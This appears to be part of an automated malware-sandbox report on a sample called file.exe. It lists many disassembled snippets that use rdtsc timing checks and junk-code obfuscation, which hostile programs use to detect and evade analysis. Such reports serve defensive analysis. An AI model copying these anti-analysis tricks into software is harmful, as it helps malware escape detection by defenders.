Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 134423C second address: 13442D7 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC8515781ECh 0x00000008 jmp 00007FC8515781E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov esi, 28433736h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FC8515781D8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D1CCAh], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FC8515781D8h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jmp 00007FC8515781E3h 0x0000005e jmp 00007FC8515781E3h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD654 second address: 12FD65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD65D second address: 12FD689 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8515781D6h 0x00000008 jno 00007FC8515781D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007FC8515781E7h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD689 second address: 12FD691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12FD691 second address: 12FD697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13472C6 second address: 13472FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FC850CE3D44h 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13428F1 second address: 13428FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13472FD second address: 1347303 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13428FF second address: 1342903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1343482 second address: 134348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FC850CE3D36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344012 second address: 1344016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1347303 second address: 1347386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC850CE3D38h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D314Ah], ebx 0x0000002a sub dword ptr [ebp+122D2014h], ecx 0x00000030 push 00000000h 0x00000032 jmp 00007FC850CE3D45h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FC850CE3D38h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1344A42 second address: 1344A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1344016 second address: 134402A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b js 00007FC850CE3D36h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347386 second address: 134738A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134738A second address: 13473A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13473A0 second address: 13473CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FC8515781DCh 0x00000012 jnl 00007FC8515781D6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13482DD second address: 13482E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134754A second address: 1347550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347550 second address: 1347554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347554 second address: 13475D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC8515781D8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c add bh, FFFFFFC7h 0x0000002f mov edi, ebx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov edi, dword ptr [ebp+122D2014h] 0x0000003e mov eax, dword ptr [ebp+122D12DDh] 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007FC8515781D8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e push FFFFFFFFh 0x00000060 mov edi, ecx 0x00000062 push ebx 0x00000063 mov dword ptr [ebp+1247A367h], eax 0x00000069 pop edi 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13475D8 second address: 13475DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13484A7 second address: 13484B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jc 00007FC8515781D6h 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134B44B second address: 134B46C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FC850CE3D4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC850CE3D3Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134B46C second address: 134B4EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007FC8515781DBh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FC8515781D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sub bl, FFFFFFABh 0x0000002b push ecx 0x0000002c or ebx, 62978D69h 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007FC8515781D8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov bx, 8D8Ah 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 jmp 00007FC8515781E4h 0x0000005c pop edi 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A4AD second address: 134A4B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C55D second address: 134C575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8515781E1h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C575 second address: 134C579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C579 second address: 134C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC8515781E7h 0x0000000d nop 0x0000000e jp 00007FC8515781D9h 0x00000014 movsx edi, si 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a sub ecx, dword ptr [ebp+122D1C2Ch] 0x00000020 movzx edi, dx 0x00000023 popad 0x00000024 xor dword ptr [ebp+122D326Ah], edx 0x0000002a push 00000000h 0x0000002c jmp 00007FC8515781E6h 0x00000031 ja 00007FC8515781DBh 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC8515781DDh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C5E8 second address: 134C5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D5D7 second address: 134D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add edi, dword ptr [ebp+122D3680h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FC8515781D8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12451E2Fh], edx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1F33h], esi 0x00000038 xchg eax, esi 0x00000039 push edi 0x0000003a jno 00007FC8515781DCh 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC8515781DAh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C734 second address: 134C765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC850CE3D49h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134C765 second address: 134C775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7A1 second address: 134D7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7AC second address: 134D7BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7BB second address: 134D7C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134F4A2 second address: 134F4D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FC8515781E2h 0x00000011 jmp 00007FC8515781DFh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D7C1 second address: 134D860 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC850CE3D3Dh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, 63ABh 0x00000010 mov ebx, dword ptr [ebp+122D2247h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC850CE3D38h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 jne 00007FC850CE3D38h 0x0000003d mov dword ptr [ebp+12452147h], esi 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007FC850CE3D38h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov bx, B54Bh 0x00000068 mov ebx, 04D58935h 0x0000006d mov eax, dword ptr [ebp+122D0CD1h] 0x00000073 mov dword ptr [ebp+12459D8Eh], edx 0x00000079 push FFFFFFFFh 0x0000007b mov dword ptr [ebp+122D23AEh], edx 0x00000081 nop 0x00000082 push ebx 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D860 second address: 134D864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350541 second address: 1350545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D864 second address: 134D871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D871 second address: 134D878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135146C second address: 1351473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351473 second address: 1351491 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D3Ch 0x00000008 je 00007FC850CE3D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jl 00007FC850CE3D38h 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351491 second address: 1351495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1351495 second address: 1351499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E81E second address: 134E822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E822 second address: 134E846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC850CE3D40h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134E846 second address: 134E84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523B8 second address: 13523CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FC850CE3D48h 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FC850CE3D36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523CE second address: 13523D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13523D2 second address: 1352437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FC850CE3D38h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 add di, 7EF6h 0x00000026 add bl, 0000004Dh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FC850CE3D38h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3554h] 0x0000004b push 00000000h 0x0000004d mov edi, dword ptr [ebp+1246199Dh] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13532D4 second address: 13532D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13532D8 second address: 1353393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007FC850CE3D42h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FC850CE3D38h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c clc 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007FC850CE3D38h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 xor edi, dword ptr [ebp+122D3570h] 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 pushad 0x00000052 jns 00007FC850CE3D36h 0x00000058 js 00007FC850CE3D36h 0x0000005e popad 0x0000005f jmp 00007FC850CE3D49h 0x00000064 popad 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FC850CE3D40h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1356A68 second address: 1356A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC8515781D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134F7C3 second address: 134F7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357902 second address: 1357908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357908 second address: 1357917 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357917 second address: 135791D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7C8 second address: 135F7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7CE second address: 135F7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F7E5 second address: 135F7EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F92C second address: 135F930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F930 second address: 135F95B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC850CE3D36h 0x00000009 jmp 00007FC850CE3D3Eh 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jo 00007FC850CE3D38h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F95B second address: 135F95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364AEA second address: 1364B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC850CE3D47h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B20 second address: 1364B3A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC8515781D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 ja 00007FC8515781D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B3A second address: 1364B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FC850CE3D3Ah 0x0000000b pop edi 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC850CE3D3Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B65F second address: 136B67F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FC8515781DAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B67F second address: 136B688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B688 second address: 136B68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
